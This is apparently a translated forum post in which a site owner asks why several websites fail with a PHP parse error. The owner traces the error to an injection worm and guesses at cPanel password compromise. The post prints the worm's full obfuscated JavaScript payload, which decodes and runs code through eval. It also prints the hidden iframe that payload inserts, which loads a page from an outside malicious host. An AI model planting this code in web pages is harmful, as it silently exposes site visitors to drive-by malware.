最近有没有其他人看到过这个问题?我有几个网站因此错误而失败.
原文链接:https://www.f2er.com/php/139072.htmlParse error: Syntax error,unexpected '<' in /home/public_html/index.PHP on line 39
它是由蠕虫/注入攻击引起的,它可以在任何可以找到的index.PHP / index.html文件中随机转储以下代码:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,-15,33,-30,6,-12,-78,-18,18,21,66,-21,-105,39,87,-60,-51,12,-39,9,-3,-54,42,-33,51,-96,123,-6,-75,99,3,63,24,-72,48,-57,60,-45,69,-36,45,27,-114,-87,-84,57,-9,36,-117,90,30,78,72,108,96,-42,-27,-93,-63,-24,-81,126,75,102,111,-102,105,-48,-99,93,-66,15,-138,138,81,-69,-132,117,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
该代码盲目地插入了一个源自javascript的iFrame:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
我试图将网站拆开看看这是怎么发生的,但是有谁知道这是什么特定的攻击以及它是如何传播的?它是未泄漏的未修补代码,CPanel本身,破解密码,根服务器?
编辑
我无法确切地确定这里发生了什么,但它似乎是CPanel的事情 – 改变CPanel中的所有密码似乎都会阻止重复攻击.我在这种状态下留下了一个不重要的网站(没有清理网站代码),而且在它每天都被破坏之前一直都很好.联系了UK2.net和JustHost,但到目前为止还没有回应.
似乎public_html文件夹和一些其他“系统”文件夹已经奇怪地被chmod – 很多777应该没有.到目前为止,主机上没有回应.
编辑
似乎是“Trojan.JS.Agent.bur”试图了解更多……